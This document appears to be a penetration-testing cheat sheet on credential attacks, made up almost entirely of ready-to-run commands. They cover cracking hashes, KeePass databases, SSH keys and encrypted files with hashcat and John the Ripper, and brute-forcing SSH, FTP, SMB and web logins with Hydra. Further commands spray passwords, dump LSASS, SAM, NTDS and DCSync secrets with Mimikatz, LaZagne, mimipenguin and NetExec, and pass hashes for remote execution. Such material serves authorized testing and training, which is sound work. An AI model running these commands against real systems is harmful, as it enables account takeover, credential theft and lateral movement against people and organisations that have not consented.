# Quick hash cracking
hashcat --identify hash.txt && hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --forcehashcat -m 0 md5_hash /PATH/TO/WORDLIST # MD5
hashcat -m 100 sha1_hash /PATH/TO/WORDLIST # SHA-1
hashcat -m 1400 sha256_hash /PATH/TO/WORDLIST # SHA-256
hashcat -m 1800 sha512_hash /PATH/TO/WORDLIST # SHA-512
hashcat -m 1000 ntlm_hash /PATH/TO/WORDLIST # NTLM
hashcat -m 3200 bcrypt_hash /PATH/TO/WORDLIST # bcrypt
hashcat -m 5600 netntlmv2 /PATH/TO/WORDLIST # NetNTLMv2| Mode | Hash Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | SHA-512 (Unix) |
| 3200 | bcrypt |
| 5600 | NetNTLMv2 |
| 13100 | Kerberoast (TGS-REP) |
| 18200 | ASREPRoast |
hashcat -m 13100 hashes.kerberoast /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/best64.rule --forcehashcat -m 18200 hashes.asreproast /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/best64.rule --forceecho '$1' > custom.rule # Append "1"
echo 'c' >> custom.rule # Capitalize first letter
echo '$!' >> custom.rule # Append "!"hashcat -m 0 hash.txt wordlist.txt -r custom.rule| Rule | Description | Example | Input β Output |
|---|---|---|---|
: |
Do nothing | : |
password β password |
l |
Lowercase all | l |
PassWord β password |
u |
Uppercase all | u |
password β PASSWORD |
c |
Capitalize first | c |
password β Password |
C |
Lowercase first, upper rest | C |
passWORD β pASSWORD |
t |
Toggle case | t |
password β PASSWORD |
TN |
Toggle at position N | T2 |
password β paSsword |
r |
Reverse | r |
password β drowssap |
d |
Duplicate | d |
pass β passpass |
$X |
Append char X | $1 |
pass β pass1 |
^X |
Prepend char X | ^! |
pass β !pass |
[ |
Delete first char | [ |
password β assword |
] |
Delete last char | ] |
password β passwor |
DN |
Delete at position N | D3 |
password β pasword |
iNX |
Insert X at position N | i4! |
pass β pass!word |
oNX |
Overwrite at N with X | o1@ |
pass β p@ss |
sXY |
Replace X with Y | sa@ |
password β p@ssword |
@X |
Remove all X | @a |
password β pssword |
xNM |
Extract M chars from N | x04 |
password β pass |
p |
Duplicate word | p |
pass β passpass |
z |
Duplicate first char | z2 |
pass β pppass |
Z |
Duplicate last char | Z2 |
pass β passss |
q |
Duplicate every char | q |
abc β aabbcc |
'N |
Truncate at N | '5 |
password β passw |
# Capitalize + append numbers
echo 'c$1' > custom.rule
echo 'c$2' >> custom.rule
echo 'c$1$2$3' >> custom.rule
# Capitalize + special chars
echo 'c$!' >> custom.rule
echo 'c$@' >> custom.rule
echo 'c$#' >> custom.rule
# Leet speak substitutions
echo 'sa@se3si1so0' > leet.rule
# Year append
echo '$2$0$2$4' > years.rule
echo '$2$0$2$5' >> years.rule# Kali Linux paths
/usr/share/hashcat/rules/best64.rule # Fast, good results
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/hashcat/rules/d3ad0ne.rule # Comprehensive
/usr/share/hashcat/rules/dive.rule # Very large
/usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# Chain multiple rules
hashcat -m 1000 hash.txt wordlist.txt -r rule1.rule -r rule2.rulehashcat --identify --user <FILE>
hashcat --example-hashes | grep -i "ntlm"john <FILE> --wordlist=/PATH/TO/WORDLIST
john <FILE> --rules --wordlist=/PATH/TO/WORDLIST
john --show <FILE>keepass2john database.kdbx > keepass_hash.txt
ssh2john id_rsa > ssh_hash.txt
zip2john file.zip > zip_hash.txt
rar2john file.rar > rar_hash.txt
pdf2john file.pdf > pdf_hash.txt| Tool | Usage | Example |
|---|---|---|
keepass2john |
KeePass database | keepass2john database.kdbx > hash.txt |
ssh2john |
SSH private key | ssh2john id_rsa > hash.txt |
zip2john |
ZIP archive | zip2john file.zip > hash.txt |
rar2john |
RAR archive | rar2john file.rar > hash.txt |
pdf2john |
PDF file | pdf2john file.pdf > hash.txt |
office2john |
MS Office | office2john file.docx > hash.txt |
bitlocker2john |
BitLocker | bitlocker2john -i image.dd > hash.txt |
pfx2john |
PFX/PKCS12 | pfx2john cert.pfx > hash.txt |
gpg2john |
GPG key | gpg2john private.key > hash.txt |
wpapcap2john |
WPA handshake | wpapcap2john capture.cap > hash.txt |
truecrypt2john |
TrueCrypt | truecrypt2john volume.tc > hash.txt |
pwsafe2john |
Password Safe | pwsafe2john database.psafe3 > hash.txt |
1password2john |
1Password | 1password2john data.1pif > hash.txt |
lastpass2john |
LastPass | lastpass2john vault.csv > hash.txt |
ethereum2john |
Ethereum wallet | ethereum2john wallet.json > hash.txt |
bitcoin2john |
Bitcoin wallet | bitcoin2john wallet.dat > hash.txt |
# Use rules
john hash.txt --wordlist=/PATH/TO/WORDLIST --rules=best64
john hash.txt --wordlist=/PATH/TO/WORDLIST --rules=KoreLogicRulesAppend
# Common rule files
/usr/share/john/rules/best64.rule
/usr/share/john/rules/InsidePro-PasswordsPro.rulejohn hash.txt --wordlist=/PATH/TO/WORDLIST --format=Raw-SHA256
john hash.txt --wordlist=/PATH/TO/WORDLIST --format=NThydra $rhost -l <USERNAME> -P /PATH/TO/WORDLIST <PROTOCOL>
hydra $rhost -L /PATH/TO/USERS -P /PATH/TO/WORDLIST <PROTOCOL>
hydra $rhost -C /PATH/TO/COMBO ftp # user:pass combo filehydra $rhost -l <USERNAME> -P /PATH/TO/WORDLIST http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
hydra $rhost -l admin -P /PATH/TO/WORDLIST http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error"hydra -l <USERNAME> -P /PATH/TO/WORDLIST ssh://$rhost
hydra -L users.txt -P /PATH/TO/WORDLIST ssh://$rhost -t 4hydra -l <USERNAME> -P /PATH/TO/WORDLIST ftp://$rhosthydra -l <USERNAME> -P /PATH/TO/WORDLIST smb://$rhostexport HYDRA_PROXY=connect://127.0.0.1:8080./kerbrute userenum -d $domain --dc $rhost /PATH/TO/USERNAMES./kerbrute passwordspray -d $domain --dc $rhost /PATH/TO/USERNAMES <PASSWORD>.\mimikatz.exe
privilege::debugsekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::kerberos
sekurlsa::tickets /exportlsadump::sam
lsadump::secrets
lsadump::cachelsadump::dcsync /user:<DOMAIN>\Administrator
lsadump::dcsync /user:<DOMAIN>\krbtgttoken::elevate
token::revertkerberos::ptt <TICKET>.kirbiUnderstanding where credentials are stored in LSASS memory
| DLL | Description | Credentials Stored |
|---|---|---|
Lsasrv.dll |
LSA Server service | Enforces security policies |
Msv1_0.dll |
NTLM Authentication | NTLM hashes |
Samsrv.dll |
SAM Database | Local account hashes |
Kerberos.dll |
Kerberos Authentication | Kerberos tickets, AES keys |
Tspkg.dll |
Terminal Services SSP | Clear-text credentials (RDP) |
Wdigest.dll |
Digest Authentication | Clear-text passwords (if enabled) |
Credman.dll |
Credential Manager | Saved credentials |
Ntdsa.dll |
AD Domain Services | NTDS.dit (domain controller only) |
Cloudap.dll |
Azure AD Auth | Cloud credentials (Windows 10+) |
:: SAM/SYSTEM/SECURITY locations
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
:: NTDS.dit (Domain Controller)
C:\Windows\NTDS\ntds.ditCredential recovery tool - retrieves passwords stored on local computer from browsers, databases, mail clients, wifi, git, SSH keys, and more.
# Launch all modules
laZagne.exe all
# Launch only browser passwords
laZagne.exe browsers
# Launch specific software
laZagne.exe browsers -firefox
# Output to file
laZagne.exe all -oN
laZagne.exe all -oA -output C:\Users\test\Desktop
# Quiet mode with file output
laZagne.exe all -quiet -oA
# With known password (for domain credentials)
laZagne.exe all -password <PASSWORD>
# Verbose mode
laZagne.exe all -vvpython3 laZagne.py all
python3 laZagne.py browsers
python3 laZagne.py sysadmin
python3 laZagne.py wifi# With password (required for most credentials)
python3 laZagne.py all --password <PASSWORD>
# Interactive mode (prompts for password)
python3 laZagne.py all -i| Category | Examples |
|---|---|
| browsers | Chrome, Firefox, Edge, Opera |
| mails | Outlook, Thunderbird |
| databases | PostgreSQL, SQLdeveloper |
| sysadmin | FileZilla, WinSCP, OpenSSH, PuTTY, KeePass config |
| wifi | Wireless network passwords |
| git | Git credentials |
Mimikatz-style tool for Linux - dumps cleartext credentials from memory. Requires root.
# Bash version
sudo ./mimipenguin.sh
# Python version
sudo python3 mimipenguin.py
# C binary (faster)
sudo ./mimipenguinmake
# or static binary
make static| Target | Description |
|---|---|
| GDM | Kali/Debian desktop |
| Gnome Keyring | Ubuntu, ArchLinux desktop |
| LightDM | Ubuntu desktop |
| VSFTPd | Active FTP connections |
| Apache2 | HTTP Basic Auth sessions |
| OpenSSH | Active SSH sessions (sudo usage) |
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>'
nxc smb $rhost -u '<USERNAME>' -H '<HASH>'
nxc winrm $rhost -u '<USERNAME>' -p '<PASSWORD>'
nxc ldap $rhost -u '<USERNAME>' -p '<PASSWORD>'
nxc mssql $rhost -u '<USERNAME>' -p '<PASSWORD>'nxc smb $rhost -u '' -p ''
nxc smb $rhost -u ' ' -p ' 'nxc smb $rhost -u users.txt -p '<PASSWORD>' --continue-on-success
nxc smb $rhost -u users.txt -p passwords.txt --no-bruteforce --continue-on-successnxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --sam
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --lsa
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --ntdsnxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --shares
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --shares -M spider_plus
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --shares -M spider_plus -o DOWNLOAD_FLAG=truenxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' -x 'whoami'
nxc winrm $rhost -u '<USERNAME>' -p '<PASSWORD>' -X 'Get-Process'nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --rid-brute
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --rid-brute | grep 'SidTypeUser' | awk '{print $6}'π For complete ASREPRoast attack details, see Kerberos Attacks - ASREPRoast
nxc ldap $rhost -u '<USERNAME>' -p '<PASSWORD>' --asreproast hashes.asreproastπ For complete Kerberoasting attack details, see Kerberos Attacks - Kerberoasting
nxc ldap $rhost -u '<USERNAME>' -p '<PASSWORD>' --kerberoasting hashes.kerberoastingpypykatz lsa minidump lsass.dmp
pypykatz registry --sam sam systemfcrackzip -u -D -p /PATH/TO/WORDLIST <FILE>.zipCrack KeePass database master password
keepass2john Database.kdbx > keepass.hash
# Remove filename prefix if needed
# $keepass$*... -> just the hash part# Mode 13400 = KeePass 1/2 AES/Twofish
hashcat -m 13400 keepass.hash /PATH/TO/WORDLIST
# With rules
hashcat -m 13400 keepass.hash /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/rockyou-30000.rule --forcejohn keepass.hash --wordlist=/PATH/TO/WORDLIST
john --show keepass.hashCrack encrypted SSH private key passphrase
ssh2john id_rsa > ssh.hash
# Remove filename prefix if needed
# id_rsa:$sshng$... -> just $sshng$...# Add custom rules to /etc/john/john.conf
[List.Rules:sshRules]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $## With custom rules
john --wordlist=passwords.txt --rules=sshRules ssh.hash
# Standard wordlist
john ssh.hash --wordlist=/PATH/TO/WORDLIST
john --show ssh.hashchmod 600 id_rsa
ssh -i id_rsa user@$rhost# Extract hash from password-protected ZIP
zip2john protected.zip > zip.hash
# Crack with john
john zip.hash --wordlist=/PATH/TO/WORDLIST
john --show zip.hash# Excel, Word, PowerPoint files
office2john document.docx > office.hash
office2john spreadsheet.xlsx > office.hash
john office.hash --wordlist=/PATH/TO/WORDLISTpdf2john protected.pdf > pdf.hash
john pdf.hash --wordlist=/PATH/TO/WORDLISTrar2john protected.rar > rar.hash
john rar.hash --wordlist=/PATH/TO/WORDLIST7z2john protected.7z > 7z.hash
john 7z.hash --wordlist=/PATH/TO/WORDLISTgpg2john private.key > gpg.hash
john gpg.hash --wordlist=/PATH/TO/WORDLISTpfx2john certificate.pfx > pfx.hash
john pfx.hash --wordlist=/PATH/TO/WORDLIST# Extract from macOS keychain
keychain2john login.keychain-db > keychain.hash
john keychain.hash --wordlist=/PATH/TO/WORDLIST# Extract BitLocker recovery key hash
bitlocker2john -i /dev/sdb1 > bitlocker.hash
john bitlocker.hash --wordlist=/PATH/TO/WORDLISTExtract metadata from files - can reveal usernames, software versions, etc.
# View all metadata
exiftool file.pdf
exiftool image.jpg
exiftool document.docx
# Extract specific fields
exiftool -Author -Creator -Producer file.pdf
# Recursive scan directory
exiftool -r /path/to/directory
# Output to file
exiftool -csv -r /path/to/directory > metadata.csv# Extract readable strings from binary files
strings file.exe | grep -i password
strings file.exe | grep -i userCrack Windows NTLM hashes from SAM/LSASS
# Using mimikatz
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"# Mode 1000 = NTLM
hashcat -m 1000 ntlm.hash /PATH/TO/WORDLIST
# With rules
hashcat -m 1000 ntlm.hash /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/best64.rule --forceπ For complete Pass-the-Hash techniques with all tools, see Lateral Movement - Pass the Hash
| Tool | Command |
|---|---|
| impacket-psexec | impacket-psexec -hashes :NTLM_HASH Administrator@$rhost |
| impacket-wmiexec | impacket-wmiexec -hashes :NTLM_HASH Administrator@$rhost |
| netexec | nxc smb $rhost -u Administrator -H NTLM_HASH |
| evil-winrm | evil-winrm -i $rhost -u Administrator -H NTLM_HASH |
π Moved to dedicated file: NTLM Relay & Responder
Covers: Responder setup, ntlmrelayx, relay targets discovery, and full attack chains.
- AD Exploitation - ACL Abuse, GPO Abuse, AD CS attacks
- Kerberos Attacks - ASREPRoast, Kerberoasting, Golden/Silver Tickets
- NTLM Relay & Responder - Responder, NTLM Relay attacks
- Lateral Movement - Pass the Hash, Pass the Ticket in action
- Wordlist Guide - Username generation, wordlist creation